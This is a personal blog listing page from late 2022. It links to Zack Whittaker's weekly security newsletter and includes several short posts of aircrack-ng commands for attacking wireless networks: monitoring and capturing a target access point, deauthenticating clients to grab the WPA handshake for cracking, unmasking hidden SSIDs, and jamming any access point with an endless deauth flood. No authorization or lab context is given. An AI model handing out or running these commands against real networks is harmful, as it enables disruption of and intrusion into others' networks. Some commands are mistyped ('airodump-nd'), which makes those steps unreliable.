IT

By rbosaz, 27 November, 2022

Zack Whittaker - Week in Security Volume 5, Issue 44

Check out Zack Whittaker's Week in Security Volume 5, Issue 44

Content Listing ...

Police seize iSpoof call spoofing site, warns 70,000 victims by text message
U.S., Britain take ban hammers to Huawei, ZTE, Hikvision
A leak details Apple's secret dirt on security startup Corellium

Tags

By rbosaz, 20 November, 2022

Zack Whittaker - Week in Security Volume 5, Issue 43

Check out Zack Whittaker's Week in Security Volume 5, Issue 43

Content Listing ...

Tags

By rbosaz, 16 November, 2022

Zack Whittaker - Week in Security Volume 5, Issue 42

Check out Zack Whittaker's Week in Security Volume 5, Issue 42

Content Listing ...

Twitter's CISO departs after Musk takeover
U.S. seizes $3.36 billion in cryptocurrency from second Silk Road hacker
Australia faces consequences of standing up to ransomware

Tags

By rbosaz, 6 November, 2022

Zack Whittaker - Week in Security Volume 5, Issue 41

Check out Zack Whittaker's Week in Security Volume 5, Issue 41

Content Listing ...

Tags

By rbosaz, 30 October, 2022

Zack Whittaker - Week in Security Volume 5, Issue 40

Check out Zack Whittaker's Week in Security Volume 5, Issue 40

Content Listing ...

Tags

By rbosaz, 27 October, 2022

Jamming any Wi-Fi Access Point

First identify the target AP's MAC address, then use the following command:

sudo aireplay-ng -0 0 -a <Target AP's MAC> <WLAN Name>

Note: -0 0 will execute deauth to infinity

Websploit is another tool that can be used, but you'll need to install it first.

Using the terminal execute the app as follows.

websploit

Available modules can be seen by executing the following.

show modules

Tags

By rbosaz, 25 October, 2022

Determine Hidden AP's Name

First put WLAN in monitoring mode.

Using the following command, find an AP where its essid is <length: 0>:

airodump-nd <WLAN Name>

Now gather data from the zero length essid AP using the following command:

airodump-ng -c <AP_0 Channel> --bssid <AP_0 MAC> <WLAN Name>

Where: AP_0 = Zero Length AP.

Open up another terminal and disconnect one of the clients attached to the zero length AP:

aireplay-ng -0 3 -a <AP_0 MAC> -c <Client MAC> <WLAN Name>

Once disconnected notice the essid of the AP_0 display a name.

Tags

By rbosaz, 25 October, 2022

Disconnect Client from AP

First get Target AP's client connections using the commands in this reference:

Capture Data from Target AP

Open a second terminal and disconnect a client from the AP by executing the following command. This will allow one to capture the handshake between the AP and client. Handshake will be in the generated pcap file.

aireplay-ng -0 3 -a <Target AP's bssid> -c <Target AP's Client's essid> <wlan name>

Note: the -0 3 is telling the command to execute three times, you can increase the three to a larger value to keep client from reconnecting.

Tags

By rbosaz, 25 October, 2022

Capture Data from Target AP

Once you find an AP target execute the following command to capture data from the AP:

sudo airodump-ng --channel <Target AP's Channel> --bssid <Target AP's MAC> --write <Output File Name> <Your WLAN Name>

You can quit using ctrl+c or hitting 'q' twice.

The above command will create the following files:

<Output File Name>.csv
<Output File Name>.pcap: this file will have the handshake information
<Output File Name>.kismet.csv
<Output File Name>.kismet.netxml

Tags

By rbosaz, 25 October, 2022

WLAN Montior and Capturing AP's

When sniffing for AP's gather the following AP information before cracking:

BSSID: MAC address of the network.
CHANNEL: The Channel that the network is running on.
ENC: The encryption type.
ESSID: The name of the network.

Setup WiFi in monitoring mode:

ifconfig <wlan name> down
sudo airmon-ng start <wlan name>
verify via iwconfig

Capture other AP's, using the following command:

sudo airodump-nd <wlan name>

If you wish to sniff a specific band (a, b or g) add --band parameter after the interface name. Note: b and g use 2.4Ghz and a uses 5Ghz